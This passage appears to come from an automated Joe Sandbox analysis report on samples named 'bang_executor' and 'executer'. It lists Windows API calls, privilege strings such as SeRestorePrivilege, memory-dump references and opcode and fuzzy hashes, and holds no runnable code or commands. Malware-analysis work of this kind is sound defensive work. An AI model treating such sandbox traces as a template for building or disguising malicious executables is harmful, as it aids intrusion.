                                        • Instruction Fuzzy Hash: 44F082213007446B86346F9ADC4984AB7ADFBC5B21710091AEA85C3601C3B0F94487B9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,004E9343,?,?,?), ref: 004EC1EE
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,?,004E9343,?,?), ref: 004EC22C
                                        • SetFileTime.KERNEL32(00000800,?,?,00000000,?,?,?,004E9343,?,?,?,?,?,?,?,?), ref: 004EC2AF
                                        • CloseHandle.KERNEL32(00000800,?,?,?,004E9343,?,?,?,?,?,?,?,?,?,?), ref: 004EC2B6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: File$Create$CloseHandleTime
                                        • String ID:
                                        • API String ID: 2287278272-0
                                        • Opcode ID: fb568db82731a0c68acc29e66b14795b21857ff3a0635244757e0081f77a1cad
                                        • Instruction ID: 3249d591ac6984158f0f27783610f466da6156a65ba7aa818000e0ea0d3f45a9
                                        • Opcode Fuzzy Hash: fb568db82731a0c68acc29e66b14795b21857ff3a0635244757e0081f77a1cad
                                        • Instruction Fuzzy Hash: A14115306483819EE320DF65CC85FABBBE8AF89705F04091EB1D2D72C1C668DA0D8B56
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _wcslen.LIBCMT ref: 004EBD93
                                        • _wcslen.LIBCMT ref: 004EBDB6
                                        • _wcslen.LIBCMT ref: 004EBE4C
                                        • _wcslen.LIBCMT ref: 004EBEB1
                                          • Part of subcall function 004EC37A: FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,004E87BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 004EC3A5
                                          • Part of subcall function 004EBBFF: RemoveDirectoryW.KERNEL32(00000001,?,00000001,00000000), ref: 004EBC1C
                                          • Part of subcall function 004EBBFF: RemoveDirectoryW.KERNEL32(?,00000001,?,00000800), ref: 004EBC48
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen$DirectoryRemove$CloseFind
                                        • String ID:
                                        • API String ID: 973666142-0
                                        • Opcode ID: 2b156689e3ea54ac556007fc1594c0ba8ea6006c3ce1fc61aa71a71ac402cba5
                                        • Instruction ID: 31d6edaf7e4de64cea8ec3c338980b2ca0798a7a785a3dcd676514c6460f217d
                                        • Opcode Fuzzy Hash: 2b156689e3ea54ac556007fc1594c0ba8ea6006c3ce1fc61aa71a71ac402cba5
                                        • Instruction Fuzzy Hash: A941D9725043D096CB30AB6A88459FFB3E9EF84301F50481FEA8993241DB7C9D89C7DA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetLastError.KERNEL32(?,00000000,00000800,?,?,08ADEBCE,00000000,?,00000000), ref: 004E8596
                                          • Part of subcall function 004E8C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 004E8CB2
                                          • Part of subcall function 004E8C95: OpenProcessToken.ADVAPI32(00000000), ref: 004E8CB9
                                          • Part of subcall function 004E8C95: GetLastError.KERNEL32 ref: 004E8CF6
                                          • Part of subcall function 004E8C95: CloseHandle.KERNEL32(?), ref: 004E8D05
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorLastProcess$CloseCurrentHandleOpenToken
                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege$TP
                                        • API String ID: 3931873934-3055981536
                                        • Opcode ID: 86fd8f6a1e47a47bdf85adfba95298164305e0b03d584c75172f91b1abd99018
                                        • Instruction ID: 8d81589027319c9653605fd612a16e77b83fd61e33852e0cc49e58b863576f51
                                        • Opcode Fuzzy Hash: 86fd8f6a1e47a47bdf85adfba95298164305e0b03d584c75172f91b1abd99018
                                        • Instruction Fuzzy Hash: 4741C571A04288AEDF20DF56DC05BFE77A8EF59305F04005EF509A7281DB795E48CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00506F64,00000000,00000000,00507F99,?,00507F99,?,00000001,00506F64,?,00000001,00507F99,00507F99), ref: 0050F025
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0050F0AE
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0050F0C0
                                        • __freea.LIBCMT ref: 0050F0C9
                                          • Part of subcall function 0050BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00506A24,?,0000015D,?,?,?,?,00507F00,000000FF,00000000,?,?), ref: 0050BCC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: bbba30b3ab087df4ab367171da63c168d052912ecaa84d6c8872f8d592eef05c
                                        • Instruction ID: 66d1d1efb0f8f442792046edf191559d960f197837a3804e033e7edc44cc4a73
                                        • Opcode Fuzzy Hash: bbba30b3ab087df4ab367171da63c168d052912ecaa84d6c8872f8d592eef05c
                                        • Instruction Fuzzy Hash: AE31CD72A0020AABDB249F64DC59EAE7FA5FB40310F048229FC05D7192EB35CD94CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetDC.USER32(00000000), ref: 004FC5F6
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 004FC605
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004FC613
                                        • ReleaseDC.USER32(00000000,00000000), ref: 004FC621
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1035833867-0
                                        • Opcode ID: 936f6ecc3eb4d01f1800c5b0d390416b2a9e6e326b2cc01b520d898bd15fa330
                                        • Instruction ID: 2bca0ac9efd2b7b745986bed2828c38748975d857e1dfcbec3fab59039d4200e
                                        • Opcode Fuzzy Hash: 936f6ecc3eb4d01f1800c5b0d390416b2a9e6e326b2cc01b520d898bd15fa330
                                        • Instruction Fuzzy Hash: 07E0EC3598AAA8A7D7212B61AC1DFEB3F54EF3F757F040405F60596290CBB444099FD4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: }
                                        • API String ID: 176396367-4239843852
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • IsWindowVisible.USER32(0001045C), ref: 00500210
                                        • DialogBoxParamW.USER32(GETPASSWORD1,0001045C,004FD510,?,?), ref: 00500247
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: DialogParamVisibleWindow
                                        • String ID: GETPASSWORD1
                                        • API String ID: 3157717868-3292211884
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 004F12F6: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 004F1315
                                          • Part of subcall function 004F12F6: GetProcAddress.KERNEL32(0052C1F0,CryptUnprotectMemory), ref: 004F1325
                                        • GetCurrentProcessId.KERNEL32(?,00000200,?,004F1366), ref: 004F13F9
                                        Strings
                                        • CryptUnprotectMemory failed, xrefs: 004F13F1
                                        • CryptProtectMemory failed, xrefs: 004F13B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AddressProc$CurrentProcess
                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                        • API String ID: 2190909847-396321323
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _swprintf.LIBCMT ref: 004ED8D3
                                          • Part of subcall function 004E4C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E4C13
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: __vswprintf_c_l_swprintf
                                        • String ID: %c:\
                                        • API String ID: 1543624204-3142399695
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0050130A
                                        • ___raise_securityfailure.LIBCMT ref: 005013F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                        • String ID: 8]T
                                        • API String ID: 3761405300-3056262094
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0050B9A5: GetLastError.KERNEL32(?,005250C4,00506E12,005250C4,?,?,0050688D,?,?,005250C4), ref: 0050B9A9
                                          • Part of subcall function 0050B9A5: _free.LIBCMT ref: 0050B9DC
                                          • Part of subcall function 0050B9A5: SetLastError.KERNEL32(00000000,?,005250C4), ref: 0050BA1D
                                          • Part of subcall function 0050B9A5: _abort.LIBCMT ref: 0050BA23
                                        • _abort.LIBCMT ref: 0050E1D0
                                        • _free.LIBCMT ref: 0050E204
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorLast_abort_free
                                        • String ID: p,R
                                        • API String ID: 289325740-400878132
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00501410
                                        • ___raise_securityfailure.LIBCMT ref: 005014CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                        • String ID: 8]T
                                        • API String ID: 3761405300-3056262094
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LoadStringW.USER32(004E7BEB,?,004E1436,004E7BEB), ref: 004F05F8
                                        • LoadStringW.USER32(004E7BEB,?,004E1436), ref: 004F060F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: LoadString
                                        • String ID: pPR
                                        • API String ID: 2948472770-2490293454
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,004F31E7,?,?,004F325F,?,?,?,?,?,004F3249), ref: 004F30D0
                                        • GetLastError.KERNEL32(?,?,004F325F,?,?,?,?,?,004F3249), ref: 004F30DC
                                          • Part of subcall function 004E7BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E7BD5
                                        Strings
                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 004F30E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                        • API String ID: 1091760877-2248577382
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,004EF951,?), ref: 004F01FF
                                        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,004EF951,?), ref: 004F020D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: FindHandleModuleResource
                                        • String ID: RTL
                                        • API String ID: 3537982541-834975271
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;M_I$<M_I$=M_I$>M_I
                                        • API String ID: 0-1360018315
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 280ccd1f1956b1cdf8cffc4f36a196b28f353d53e10f01e84d205e1f4cc943f2
                                        • Instruction ID: 86e7e579dc8273feb4492a65fb3459254cbb501e81c2669ea8c6ef78698905f8
                                        • Opcode Fuzzy Hash: 280ccd1f1956b1cdf8cffc4f36a196b28f353d53e10f01e84d205e1f4cc943f2
                                        • Instruction Fuzzy Hash: D4C1C730B19A4E4FDBD9EF68C4A4AA977E1FF58304F1405A9E41AC72D6CE75E842CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f81af82390b34a488e01b6fc9afec97b9a633f008661b552919aa819c7f19a99
                                        • Instruction ID: dd697e47355bd57b1f4bb4fbe07e68fca73e0799c741a78cd3e18c09b0c15db5
                                        • Opcode Fuzzy Hash: f81af82390b34a488e01b6fc9afec97b9a633f008661b552919aa819c7f19a99
                                        • Instruction Fuzzy Hash: 2071F730609B8E8FDBD5DF68C451AAA77B1FF59300F1046AAD459CB2D6CA35E981CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2bd2a8e55d55107673b45e539e1518f33b94fe44ea15b81ccebf141d9ab620d8
                                        • Instruction ID: 697f4cc44ad274172b986e3ccb689032b6fd803c18bc358b1110d145b902b699
                                        • Opcode Fuzzy Hash: 2bd2a8e55d55107673b45e539e1518f33b94fe44ea15b81ccebf141d9ab620d8
                                        • Instruction Fuzzy Hash: 5851DF21A0E6CE0EE7B6A77448312E57FA0DF47650F4A11FBD48CCB0E7D8596A1A8352
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c3fb514705b2113567c0335dee26df84ed168a0091ba204f44a4e44419ee0962
                                        • Instruction ID: 9cd582b4020dfeb18c494f30ab8896d30611ebee3e351ebb30d3b1b83dd844e1
                                        • Opcode Fuzzy Hash: c3fb514705b2113567c0335dee26df84ed168a0091ba204f44a4e44419ee0962
                                        • Instruction Fuzzy Hash: B0517431B19A4E8FDBE8EF58C4A4ABA77E1FF54314B15057AE41AC3295CE74E841CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7957c90fdb56510a71c2305015258f314161d096cbf6716b2090d3de84374b1c
                                        • Instruction ID: 35b785a12d6839cf58e5e7a08a0060397e8e30601a7e4a3a930b809a339132fb
                                        • Opcode Fuzzy Hash: 7957c90fdb56510a71c2305015258f314161d096cbf6716b2090d3de84374b1c
                                        • Instruction Fuzzy Hash: 39110522F0E95E0AFBF4A7A848312F932D0EF45710F4321BAD41DC30E3DD593A0A0285
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48ab6caf2daefec12db0ec518aca71c8df50de109b85bb1c5c7ce50bd5ccd389
                                        • Instruction ID: 4605afc34ef6ad8c8bf702768038511dd35422e233fcd23ba140cd9e6022184a
                                        • Opcode Fuzzy Hash: 48ab6caf2daefec12db0ec518aca71c8df50de109b85bb1c5c7ce50bd5ccd389
                                        • Instruction Fuzzy Hash: F5E0E511A0F7990FE7B993AD48623617EE2DB49610F0991EFD089C26E3C8C81C424352
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be2c0910c6fc9ddb33182ff37faa4df2fec6d1f99970dbc274058122e2e4ace4
                                        • Instruction ID: 5d56c48a675e8f28a9d8706649a076efef40420e0aeb451a33f264ee83ecf837
                                        • Opcode Fuzzy Hash: be2c0910c6fc9ddb33182ff37faa4df2fec6d1f99970dbc274058122e2e4ace4
                                        • Instruction Fuzzy Hash: 57E0C221F4A81E89EB94B3B468B69FDB245DFC4204FC21871E42EC20CBCD6A29010182
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82a20963e53c0277aa6fc9bf29962bef43e7fc86a0dcd4ccc01d1cf52aeb1bdd
                                        • Instruction ID: cae1192e71673577aa90574db652e2464a774fe2f5b38a40059027ec9b81555f
                                        • Opcode Fuzzy Hash: 82a20963e53c0277aa6fc9bf29962bef43e7fc86a0dcd4ccc01d1cf52aeb1bdd
                                        • Instruction Fuzzy Hash: 44E04F3145CB084BC354DF18D48049AB7E0FF94320F801B2EF05AC21B5DB7596818A82
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1779620795.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ffd9ba10000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fc91aa629313a8e6e70ac2125ce2d3642d9eabcbc7900c859150b4019d9e91c8
                                        • Instruction ID: 5feb92f41c138d6eb2bcfd40ad6767d2e0bbba01d14f6b1f5390d77fcc5b7118
                                        • Opcode Fuzzy Hash: fc91aa629313a8e6e70ac2125ce2d3642d9eabcbc7900c859150b4019d9e91c8
                                        • Instruction Fuzzy Hash: B1C0123256D64D57D391AB10E451CEA7350FF90610F842B39F04B410A9DD6566858582
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1630530388.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b9f0000_executer.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 29ef1822e567fd1a9ebc295d8343ae38436c4c500e81750c28b56b3b331a7784
                                        • Instruction ID: 80db67e23dd32d37ec449ace335845bde0bf6a15dad3bbd21b07677c6f55a8da
                                        • Opcode Fuzzy Hash: 29ef1822e567fd1a9ebc295d8343ae38436c4c500e81750c28b56b3b331a7784
                                        • Instruction Fuzzy Hash: 54510752F1EAC65FE7626BB888755E87FA4EF5272070A00F7D498C70E3EE196C058351
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1630530388.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b9f0000_executer.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 829680f45b18536aa90d22d19446ee0ddb3fc56f2e81de3f49eb9f08244f277a
                                        • Instruction ID: 44917572707cf2930b953f4796733bcb0dcce68138708232e8db37fd2420fe80
                                        • Opcode Fuzzy Hash: 829680f45b18536aa90d22d19446ee0ddb3fc56f2e81de3f49eb9f08244f277a
                                        • Instruction Fuzzy Hash: 0F211021F7DC1E5ED699FF5884B19ED6355FF54A2074242B9D40EC32EBEE186E018680
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1769004687.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                        Joe Sandbox IDA Plugin
